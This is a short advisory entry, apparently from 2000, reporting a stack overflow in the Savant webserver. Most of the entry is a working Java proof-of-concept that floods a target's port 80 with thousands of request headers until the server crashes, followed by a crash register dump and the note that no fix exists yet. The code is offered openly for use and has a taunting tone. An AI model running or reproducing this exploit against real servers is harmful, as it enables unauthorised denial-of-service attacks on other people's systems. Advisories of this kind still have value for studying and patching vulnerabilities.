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COMMAND Savant Webserver SYSTEMS AFFECTED Savant Webserver PROBLEM Andrew Lewis found following. He found a stack overflow in the Savant webserver the other day - lemmee just paste the code he wrote here... /* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant * Written by Wizdumb <wizdumb@leet.org || www.mdma.za.net/fk> * * The overflow occurs when the server recieves too many headers in the GET * request. The results of the attack look something like... * * SAVANT caused an invalid page fault * in module KERNEL32.DLL at 015f:bff87eb5. * * Registers: * * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000 * * Bytes at CS:EIP: * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75 * * Stack dump: * * Enjoy! * Andrew Lewis aka. Wizdumb [03/07/2000] */ import java.io.*; import java.net.*; class savantstack { public static void main(String[] args) throws IOException { if (args.length != 1) { System.out.println("Syntax: java savantstack [hostname/ip]"); System.exit(1); } Socket soq = null; PrintWriter white = null; int i = 5000; // This should do fine :-) soq = new Socket(args[0], 80); white = new PrintWriter(soq.getOutputStream(), true); System.out.print("Showing " + args[0] + " the phj33r :P ..."); white.print("GET /index.html HTTP/1.0"); for (int x = 0; x < i; x++) white.println("A:A"); white.println("\n"); System.out.println("Done!"); white.close(); soq.close(); } } SOLUTION Nothing yet.